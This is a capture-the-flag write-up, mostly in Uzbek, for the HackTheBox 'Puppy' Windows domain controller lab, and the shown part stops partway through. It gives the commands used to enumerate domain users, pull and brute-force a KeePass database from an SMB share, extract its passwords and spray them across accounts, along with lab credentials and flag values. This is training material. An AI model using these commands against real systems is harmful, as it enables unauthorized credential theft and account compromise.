Scribd
Upload
2K views32 pages

Writeup Anonymous Puppy

The document provides a detailed report on a penetration testing exercise conducted on a Microsoft Windows Server 2022 system, including information about the system's IP address, open ports, and discovered flags. It outlines the enumeration process, user credentials, vulnerabilities found, and exploitation attempts, particularly focusing on accessing shared files. The report also includes commands used during the testing and results from tools like Nmap and CrackMapExec.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
2K views32 pages

Writeup Anonymous Puppy

The document provides a detailed report on a penetration testing exercise conducted on a Microsoft Windows Server 2022 system, including information about the system's IP address, open ports, and discovered flags. It outlines the enumeration process, user credentials, vulnerabilities found, and exploitation attempts, particularly focusing on accessing shared files. The report also includes commands used during the testing and results from tools like Nmap and CrackMapExec.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 32

Puppy

Umumiy Ma’lumotlar
IP address xx.xx.xx.xx

Microsoft Windows Server 2022


Operatsion Tizim Nomi (Distribution)
Standard
Operatsion Tizim Kernel Verisyasi 10.0.20348 N/A Build 20348

Microsoft HTTPAPI httpd 2.0


Web Server dasturi va Versiyasi
(SSDP/UPnP)

53, 88, 111, 135, 139, 389, 445,


Ochiq Portlar 464, 593, 636, 2049, 3260,
3268, 3269, 5985

Topilgan Flaglar

💡 Flag ni belgilangan bo’limga nusxa ko’chirib tashlang. Bundan tashqari flag topilgan ekran screenshotini ham
ushbu bo’limga tashlang.

User Flag

💡 User Flag: b45203f370ae16d7f2e70540f2023a764

Puppy 1
Root Flag

💡 Root Flag: 2ceb313f373dab54d3eb28e0ed2d6f762

Toplgan Zaifliklar

💡 Har bitta topilgan zaiflikni shu yerda to’ldirib, u haqida batafsil malumot olish uchun link qoldirasiz. U zaiflik
nimalarga saba bo’lishi va qaysi explit orqali buzilishinni ham shu yerda tushuntirib berishingiz kerak. Birnchida
keltirilgan zaiflik bu sizga misol sifatida keltirilgan. Nechta zaiflik topa olsangiz barchasini kiriting.

Ushbu CVE x dasturining 2.X.X-versiyasida mavjud


Exploit linki berilishi
bo’lib, hujumchiga X hujumni amalga oshirishga yordam
CVE-XXXX-XXXX kerak agar mavjud
beradi. Bu zaiflik X zailik deb ataladi. Ushu havola orqali
bo’lsa
batafsil o’rganib chiqish mumkin. [Link qoldirasiz.]

Puppy 2
Hisobot

💡 Har bitta bosqichda qilgan ishlaringizni batafsil, screenshotlar, foydalanilgan explitlar bilan tushuntirib yozing.

Enumeration (Ma’lumot to’plash)


As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james /
KingofAkron2025!

user va password berilgan


user: levi.james
password: KingofAkron2025!


┌──(kali kali)-[~]
└─$ nmap -A xx.xx.xx.xx --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-17 15:00 EDT
Nmap scan report for xx.xx.xx.xx
Host is up (0.097s latency).
Not shown: 985 filtered tcp ports (no-response)
Bug in iscsi-info: no string output.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 02:00:50Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-
Name)

Puppy 3
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
2049/tcp open nlockmgr 1-4 (RPC #100021)
3260/tcp open iscsi?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site
-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:window
s_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microso
ft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb2-time:
| date: 2025-05-18T02:02:51
|_ start_date: N/A
|_clock-skew: 7h00m01s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

TRACEROUTE (using port 445/tcp)


HOP RTT ADDRESS
1 96.82 ms xx.xx.xx.xx
2 96.78 ms xx.xx.xx.xx

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.71 seconds

crackmapexec bilan userlarni scan qilamiz password va userdan foydalanib

┌──(kali ㉿kali)-[~]
└─$ sudo crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --users
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.H
TB) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB xx.xx.xx.xx 445 DC [+] Enumerated domain user(s)
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\steph.cooper_adm badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\steph.cooper badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\jamie.williams badpwdcount: 5 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\adam.silver badpwdcount: 0 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\ant.edwards badpwdcount: 0 desc:
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\levi.james badpwdcount: 0 desc:

Puppy 4
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\krbtgt badpwdcount: 0 desc: Key Distribution
Center Service Account
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\Guest badpwdcount: 0 desc: Built-in account
for guest access to the computer/domain
SMB xx.xx.xx.xx 445 DC PUPPY.HTB\Administrator badpwdcount: 0 desc: Built-in accou
nt for administering the computer/domain

DC.PUPPY.HTB PUPPY.HTB domen va domencontrollerni /etc/hosts ga qo’shamiz


┌──(kali kali)-[~]
└─$ echo "xx.xx.xx.xx DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts
10.10.11.70 DC.PUPPY.HTB PUPPY.HTB

userlarni ajratib bitta users.txt yozib olamiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ nxc smb PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print
$2}' | awk '{print $1}' > users.txt

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ cat users.txt
Administrator
Guest
krbtgt
DC$
levi.james
ant.edwards
adam.silver
jamie.williams
steph.cooper
steph.cooper_adm

/etc/resolv.conf ga domencontroller ipsini qo’yamiz va bloodhound-python bilan scan qilamiz

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ sudo nano /etc/resolv.conf

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ cat /etc/resolv.conf
nameserver xx.xx.xx.xx
nameserver 8.8.8.8
nameserver 1.1.1.1
nameserver 192.168.0.1


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'levi.james' -p 'KingofAkron2025!' -d PUPPY.HTB -c All -o bloodho
und_results.json -ns xx.xx.xx.xx
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB

Puppy 5
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 19S

Bizning userda Developers guruhiga GenericWrite huquqi bor lekin bu bilan davom eta olmaymiz shuning uchun
chuquroq qidiramiz
Exploitation (Buzib kirish)
crackmapexec bilan mavjud bo‘lgan file shares (ulashilgan papkalar) ro‘yxatini ko’ramiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ sudo crackmapexec smb xx.xx.xx.xx -u levi.james -p 'KingofAkron2025!' --shares
SMB xx.xx.xx.xx 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HT
B) (signing:True) (SMBv1:False)
SMB xx.xx.xx.xx 445 DC [+] PUPPY.HTB\levi.james:KingofAkron2025!
SMB xx.xx.xx.xx 445 DC [+] Enumerated shares
SMB xx.xx.xx.xx 445 DC Share Permissions Remark
SMB xx.xx.xx.xx 445 DC ----- ----------- ------
SMB xx.xx.xx.xx 445 DC ADMIN$ Remote Admin
SMB xx.xx.xx.xx 445 DC C$ Default share
SMB xx.xx.xx.xx 445 DC DEV DEV-SHARE for PUPPY-DEVS
SMB xx.xx.xx.xx 445 DC IPC$ READ Remote IPC
SMB xx.xx.xx.xx 445 DC NETLOGON READ Logon server share
SMB xx.xx.xx.xx 445 DC SYSVOL READ Logon server share

Bizda DEV share qilingan unga kirishga harakat qilamiz

Puppy 6
┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ smbclient \\\\xx.xx.xx.xx\\DEV -U "levi.james"
Password for [WORKGROUP\levi.james]:
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sun Mar 23 03:07:57 2025
.. D 0 Sat Mar 8 11:52:57 2025
KeePassXC-2.7.9-Win64.msi A 34394112 Sun Mar 23 03:09:12 2025
Projects D 0 Sat Mar 8 11:53:36 2025
recovery.kdbx A 2677 Tue Mar 11 22:25:46 2025

5080575 blocks of size 4096. 1545105 blocks available


smb: \> get recovery.kdbx
getting file \recovery.kdbx of size 2677 as recovery.kdbx (6.8 KiloBytes/sec) (average 6.8 KiloBytes/sec)
smb: \>

recovery.kdbx crack qilishga harakat qilamiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ sudo apt install keepassxc


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ wget https://raw.githubusercontent.com/r3nt0n/keepass4brute/master/keepass4brute.sh

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ chmod +x keepass4brute.sh

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ./keepass4brute.sh recovery.kdbx /usr/share/wordlists/rockyou.txt

keepass4brute 1.3 by r3nt0n


https://github.com/r3nt0n/keepass4brute

[+] Words tested: 38/14344394 - Attempts per minute: 63 - Estimated time remaining: 22 weeks, 4 days
[+] Current attempt: liver...

[*] Password found: liver....

liverpool passwordni topdik

recovery.kdbx faylidagi parollar va ma’lumotlarni XML formatida keepass_dump.xml fayliga chiqaramiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ keepassxc-cli export --format=xml recovery.kdbx > keepass_dump.xml
Enter password to unlock recovery.kdbx: liver...

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ll
total 32
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack

Puppy 7
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt

endi keepass_dump.xml o’qimiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ head keepass_dump.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<KeePassFile>
<Meta>
<Generator>KeePassXC</Generator>
<DatabaseName>recovery</DatabaseName>
<DatabaseNameChanged>HqBg3w4AAAA=</DatabaseNameChanged>
<DatabaseDescription>recover AD members, incase of lost credentials</DatabaseDescription>
<DatabaseDescriptionChanged>HqBg3w4AAAA=</DatabaseDescriptionChanged>
<DefaultUserName/>
<DefaultUserNameChanged>+Z9g3w4AAAA=</DefaultUserNameChanged>

Skript KeePass bilan XML eksportidan foydalanuvchi nomlari va parollarni chiqaramiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ cat extract_keepass.py
import xml.etree.ElementTree as ET

tree = ET.parse('keepass_dump.xml')
root = tree.getroot()

for entry in root.iter('Entry'):


username = None
password = None
for string in entry.findall('String'):
key = string.find('Key').text
value = string.find('Value').text
if key == 'UserName':
username = value
elif key == 'Password':
password = value
if username or password:
print(f"User: {username}, Password: {password}")

chiqarib passwordlarni passwords_only.txt filega saqlaymiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ python3 extract_keepass.py | awk -F'Password: ' '{print $2}' > passwords_only.txt

┌──(kali ㉿kali)-[~/Desktop/HTB/Puppy]
└─$ ll
total 40
-rw-rw-r-- 1 kali kali 498 May 17 15:54 extract_keepass.py
-rw-rw-r-- 1 kali kali 0 May 17 15:30 hash.txt
-rwxrwxr-x 1 kali kali 2820 May 17 15:34 keepass4brute.sh
-rw-rw-r-- 1 kali kali 12960 May 17 15:47 keepass_dump.xml
drwxrwxr-x 3 kali kali 4096 May 17 15:38 mod0keecrack

Puppy 8
-rw-rw-r-- 1 kali kali 99 May 17 15:55 passwords_only.txt
-rw-rw-r-- 1 kali kali 0 May 17 15:53 passwords.txt
-rw-r--r-- 1 kali kali 2677 May 17 15:23 recovery.kdbx
-rw-rw-r-- 1 kali kali 111 May 17 15:09 users.txt


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ cat passwords_only.txt
JamieLove2025!
HJKL2025!
HJKL2025!
Antman2025!
Antman2025!
Steve2025!
Steve2025!
ILY2025!
ILY2025!

crackmapexec bilan password spraying qilamiz


┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ crackmapexec smb 10.10.11.70 -u users.txt -p passwords_only.txt --continue-on-success
SMB 10.10.11.70 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:PUPPY.HT
B) (signing:True) (SMBv1:False)
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Administrator:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\Guest:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\krbtgt:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE

Puppy 9
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\DC$:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\levi.james:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [+] PUPPY.HTB\ant.edwards:Antman2025!
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] Connection Error: The NETBIOS connection with the remote host timed
out.
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\ant.edwards:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\adam.silver:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\jamie.williams:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:JamieLove2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Antman2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:JamieLove2025! STATUS_LOGON_FAIL
URE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE

Puppy 10
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:HJKL2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILUR
E
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Antman2025! STATUS_LOGON_FAILUR
E
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:Steve2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE
SMB 10.10.11.70 445 DC [-] PUPPY.HTB\steph.cooper_adm:ILY2025! STATUS_LOGON_FAILURE

[+] PUPPY.HTB\ant.edwards:Antman2025!
Antman2025!


┌──(kali kali)-[~/Desktop/HTB/Puppy/edward]
└─$ bloodhound-python -dc DC.PUPPY.HTB -u 'ant.edwards' -p 'Antman2025!' -d PUPPY.HTB -c All -o bloodhoun
d_results.json -ns xx.xx.xx.xx
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 20S

Puppy 11

┌──(kali kali)-[~/Desktop/HTB/Puppy]
└─$ bloodyAD --host xx.xx.xx.xx -d PUPPY.HTB -u Ant.Edwards -p 'Antman2025!' get writable --detail

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=PUPPY,DC=HTB
url: WRITE
wWWHomePage: WRITE

distinguishedName: CN=Anthony J. Edwards,DC=PUPPY,DC=HTB


thumbnailPhoto: WRITE
pager: WRITE
mobile: WRITE
homePhone: WRITE
userSMIMECertificate: WRITE
msDS-ExternalDirectoryObjectId: WRITE
msDS-cloudExtensionAttribute20: WRITE
msDS-cloudExtensionAttribute19: WRITE
msDS-cloudExtensionAttribute18: WRITE
msDS-cloudExtensionAttribute17: WRITE
msDS-cloudExtensionAttribute16: WRITE
msDS-cloudExtensionAttribute15: WRITE
msDS-cloudExtensionAttribute14: WRITE
msDS-cloudExtensionAttribute13: WRITE
msDS-cloudExtensionAttribute12: WRITE
msDS-cloudExtensionAttribute11: WRITE
msDS-cloudExtensionAttribute10: WRITE
msDS-cloudExtensionAttribute9: WRITE
msDS-cloudExtensionAttribute8: WRITE
msDS-cloudExtensionAttribute7: WRITE
msDS-cloudExtensionAttribute6: WRITE
msDS-cloudExtensionAttribute5: WRITE
msDS-cloudExtensionAttribute4: WRITE
msDS-cloudExtensionAttribute3: WRITE
msDS-cloudExtensionAttribute2: WRITE
msDS-cloudExtensionAttribute1: WRITE
msDS-GeoCoordinatesLongitude: WRITE
msDS-GeoCoordinatesLatitude: WRITE
msDS-GeoCoordinatesAltitude: WRITE

Puppy 12
msDS-AllowedToActOnBehalfOfOtherIdentity: WRITE
msPKI-CredentialRoamingTokens: WRITE
msDS-FailedInteractiveLogonCountAtLastSuccessfulLogon: WRITE
msDS-FailedInteractiveLogonCount: WRITE
msDS-LastFailedInteractiveLogonTime: WRITE
msDS-LastSuccessfulInteractiveLogonTime: WRITE
msDS-SupportedEncryptionTypes: WRITE
msPKIAccountCredentials: WRITE
msPKIDPAPIMasterKeys: WRITE
msPKIRoamingTimeStamp: WRITE
mSMQDigests: WRITE
mSMQSignCertificates: WRITE
userSharedFolderOther: WRITE
userSharedFolder: WRITE
url: WRITE
otherIpPhone: WRITE
ipPhone: WRITE
assistant: WRITE
primaryInternationalISDNNumber: WRITE
primaryTelexNumber: WRITE
otherMobile: WRITE
otherFacsimileTelephoneNumber: WRITE
userCert: WRITE
homePostalAddress: WRITE
personalTitle: WRITE
wWWHomePage: WRITE
otherHomePhone: WRITE
streetAddress: WRITE
otherPager: WRITE
info: WRITE
otherTelephone: WRITE
userCertificate: WRITE
preferredDeliveryMethod: WRITE
registeredAddress: WRITE
internationalISDNNumber: WRITE
x121Address: WRITE
facsimileTelephoneNumber: WRITE
